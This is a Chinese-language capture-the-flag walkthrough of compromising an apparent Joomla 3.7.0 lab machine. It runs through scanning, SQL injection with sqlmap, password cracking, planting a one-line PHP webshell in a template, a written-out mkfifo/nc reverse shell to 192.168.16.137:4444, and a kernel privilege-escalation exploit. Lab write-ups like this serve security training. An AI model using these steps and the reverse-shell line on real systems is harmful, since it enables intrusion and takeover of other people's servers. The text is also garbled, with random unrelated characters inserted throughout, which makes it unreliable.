flag
nmap開路漾岳,拿到靶機(jī)的IP如下:
再進(jìn)行端口掃描腋寨,結(jié)果如下:
可以看到有80端口,打開瀏覽器訪問80端口痹换。根據(jù)網(wǎng)站內(nèi)容說只有一個(gè)flag征字,要拿root才行。第一反應(yīng)就是webshell然后提權(quán)娇豫。通過指紋識(shí)別可以知道CMS是joomla(其實(shí)有經(jīng)驗(yàn)的話看網(wǎng)站標(biāo)題上面的圖標(biāo)就知道是joolma)匙姜,而kali自帶一個(gè)叫joomlascan,命令:joomscan --url 鏈接冯痢,掃描可知版本為3.7.0氮昧,登錄后臺(tái)為url/administrator。用msf搜索可利用漏洞浦楣。searchsploit joomla 3.7.0
看第一個(gè)袖肥,是注入漏洞。
接下來就是查看42033.txt這個(gè)文件振劳,需要找到其完整路徑椎组,命令:searchsploit -p php/webapps/42033.txt(-p表示顯示完整路徑)
可以看到其完整路徑,然后就可以查看它历恐,至于查看方法隨你寸癌。
它告訴了我們注入點(diǎn)以及注入方法,sqlmap的使用就不多說了弱贼,注意的是最后字段的時(shí)候不要用--batch蒸苇,每一步都選y就行了,如下是數(shù)據(jù)庫數(shù)據(jù)吮旅。我們需要拿到的是username和password數(shù)據(jù)溪烤。
結(jié)果是加密的,這里引入一個(gè)叫john的工具庇勃,它是一個(gè)解密工具檬嘀,kali自帶,直接拿來用就行了责嚷。在用之前先將密文存儲(chǔ)到一個(gè)txt文件中去鸳兽,然后john 文件.txt,然后john --show 文件.txt查看結(jié)果再层。
密碼為snoopy(史努比)贸铜,就可以拿它登錄后臺(tái)了。到這一步要最做的就是隨便點(diǎn)點(diǎn)聂受,看看有沒有上傳漏洞點(diǎn)蒿秦,經(jīng)過一番折騰,找到了一個(gè)可寫入后門的點(diǎn)蛋济,就在路徑localhost/templates/beez3/html下棍鳖。把modules.php內(nèi)容改為一句話木馬碗旅,然后用蟻劍連接(也可以新建一個(gè)文件)。
然后在虛擬終端里查詢系統(tǒng)信息祟辟,uname -a,cat /etc/issue
是Ubuntu 16.04旧困,再搜索對(duì)應(yīng)的漏洞如下醇份,為什么使用這個(gè)呢吼具,其實(shí)是一個(gè)個(gè)試出來的,最后發(fā)現(xiàn)這個(gè)可以用拗盒。怖竭。。
然后搞一個(gè)反彈shell先陡蝇。
- kali終端輸入
nc -nvlp
- 蟻劍虛擬終端輸入
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.137 4444 >/tmp/f
注意上面的ip是你kali的ip,因?yàn)樯厦嫖冶O(jiān)聽的是4444端口毅整,所以要輸入4444端口,之后kali端成功獲取反彈shell悼嫉。然后再回到漏洞版本那里,查看對(duì)應(yīng)文檔蹋凝,里面寫的有使用方法总棵。
然后把壓縮包下載下來用蟻劍上傳。在靶機(jī)里解壓情龄,之后進(jìn)入到解壓目錄捍壤,再用命令tar -xvf 目標(biāo).tar對(duì)exploit.tar進(jìn)行解壓鞍爱。進(jìn)入新生成的目錄ebpf_mapfd_doubleput_exploit,依次執(zhí)行
./compile.sh
./doubleput
成功提權(quán)盗扇,回到root文件夾沉填。發(fā)現(xiàn)有flag,直接查看